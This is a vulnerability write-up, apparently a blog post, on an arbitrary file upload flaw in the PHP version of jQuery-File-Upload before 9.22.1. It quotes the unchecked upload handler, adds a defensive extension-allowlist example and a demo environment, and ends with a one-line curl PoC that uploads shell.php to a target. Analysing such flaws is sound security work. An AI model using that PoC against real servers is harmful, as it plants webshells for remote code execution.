jQuery-File-Upload < v9.22.1 (PHP version) arbitrary file upload / code execution vulnerability

Original by sauren  2018-11-28 15:43  709 views  0 comments

1. Affected versions

jQuery-File-Upload < v9.22.1

2. Vulnerability analysis

The upload endpoint of the PHP version of jQuery-File-Upload is:

POST /server/php/index.php HTTP/1.1

Looking at index.php, we see that it simply includes another file containing the UploadHandler class and instantiates it:

error_reporting(E_ALL | E_STRICT);
require('UploadHandler.php');
$upload_handler = new UploadHandler();

In UploadHandler.php, the function that handles saving an uploaded file is as follows:

protected function handle_file_upload($uploaded_file, $name, $size, $type, $error,
        $index = null, $content_range = null) {
    $file = new \stdClass();
    $file->name = $this->get_file_name($uploaded_file, $name, $size, $type, $error,
        $index, $content_range);
    $file->size = $this->fix_integer_overflow((int)$size);
    $file->type = $type;
    if ($this->validate($uploaded_file, $file, $error, $index)) {
        $this->handle_form_data($file, $index);
        $upload_dir = $this->get_upload_path();
        if (!is_dir($upload_dir)) {
            mkdir($upload_dir, $this->options['mkdir_mode'], true);
        }
        $file_path = $this->get_upload_path($file->name);
        $append_file = $content_range && is_file($file_path) &&
            $file->size > $this->get_file_size($file_path);
        if ($uploaded_file && is_uploaded_file($uploaded_file)) {
            // multipart/formdata uploads (POST method uploads)
            if ($append_file) {
                file_put_contents(
                    $file_path,
                    fopen($uploaded_file, 'r'),
                    FILE_APPEND
                );
            } else {
                move_uploaded_file($uploaded_file, $file_path);
            }
        } else {
            // Non-multipart uploads (PUT method support)
            file_put_contents(
                $file_path,
                fopen('php://input', 'r'),
                $append_file ? FILE_APPEND : 0
            );
        }
        $file_size = $this->get_file_size($file_path, $append_file);
        if ($file_size === $file->size) {
            $file->url = $this->get_download_url($file->name);
            if ($this->is_valid_image_file($file_path)) {
                $this->handle_image_file($file_path, $file);
            }
        } else {
            $file->size = $file_size;
            if (!$content_range && $this->options['discard_aborted_uploads']) {
                unlink($file_path);
                $file->error = $this->get_error_message('abort');
            }
        }
        $this->set_additional_file_properties($file);
    }
    return $file;
}

We find that neither the POST branch (move_uploaded_file) nor the PUT branch (file_put_contents from php://input) checks the file extension or anything similar before the file is written into the upload directory, which allows arbitrary file upload.

On the official jQuery-File-Upload demo page, simply uploading an arbitrary file through the normal upload form is enough.
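The kind of file-name allowlist check that the upload flow above lacks, as an added example that is not the project's own code; it would be called from validate() before move_uploaded_file() / file_put_contents() run. The function names, the allowlist and the sample file names are assumptions for illustration.

```php
<?php
// Added example (not jQuery-File-Upload code): allowlist validation for an
// uploaded file name, applied before the file reaches the upload directory.

function is_allowed_upload_name(string $name, array $allowed_ext): bool {
    // The name becomes part of the destination path, so reject path
    // separators and NUL bytes outright.
    if ($name === '' || strpbrk($name, "/\\\0") !== false) {
        return false;
    }
    // Reject dotfiles such as .htaccess, which could change how the
    // upload directory is served.
    if ($name[0] === '.') {
        return false;
    }
    $parts = explode('.', $name);
    if (count($parts) < 2) {
        return false;                       // no extension at all
    }
    // Every extension in the name must be on the allowlist, so
    // "shell.php.jpg" is rejected as well as "shell.php" (some server
    // configurations also act on inner extensions).
    foreach (array_slice($parts, 1) as $ext) {
        if (!in_array(strtolower($ext), $allowed_ext, true)) {
            return false;
        }
    }
    return true;
}

function looks_like_image(string $path): bool {
    // Check content as well as the name: getimagesize() returns false
    // unless the file begins with a recognised image header.
    return @getimagesize($path) !== false;
}

// Constructed sample names (assumption) run through the check.
$allowed = ['gif', 'jpg', 'jpeg', 'png'];
$samples = ['photo.png', 'shell.php', 'shell.php.jpg', '.htaccess',
            '../index.php', 'noext'];
foreach ($samples as $s) {
    printf("%-16s %s\n", $s,
        is_allowed_upload_name($s, $allowed) ? 'accept' : 'reject');
}
```

Pair the name check with a web-server rule that never executes scripts from the upload directory, since the allowlist alone does not help once a file with an executable extension is already on disk.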

3. Test environment

vulnspy               https://www.vsplate.com/?github=vulnspy/jQuery-File-Upload-9.22.0&autogo=1

4. Illustrative PoC

curl -F "files=@shell.php" http://target/server/php/index.php

Copyright notice: this is an original article, copyright belongs to sauren; sharing is welcome, please keep the source attribution when reposting.